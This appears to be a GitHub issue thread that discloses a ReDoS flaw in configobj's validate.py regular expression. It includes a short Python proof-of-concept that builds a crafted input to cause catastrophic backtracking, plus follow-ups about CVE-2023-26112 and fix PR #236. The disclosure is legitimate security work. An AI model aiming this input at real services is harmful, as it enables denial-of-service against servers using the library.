The affected code is located in validate.py-line660. It uses the vulnerable regular expression (.+?)\((.*)\). When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below

from configobj.validate import Validator
value = "aaa"
i = 10
attack = '\x00'*16510*i + ')' + '('*16510*i
vtor = Validator()
newval1 = vtor.check(attack, value)

I see many projects referencing this file, when run server side there has possible DOS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

Is this security hole fixed?

CVE-2023-26112 appears to have been assigned for this issue.

just ping， if any PR fixed this CVE?

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

@robdennis I opened a PR, #236. Please let me know if you need me to change anything.

Any update on this one? Thanks

A new release including a fix (#236 ?) would be appreciated.

Dear https://github.com/DiffSK Team, please push a new release, containing these changes. Thank you for the prompt support!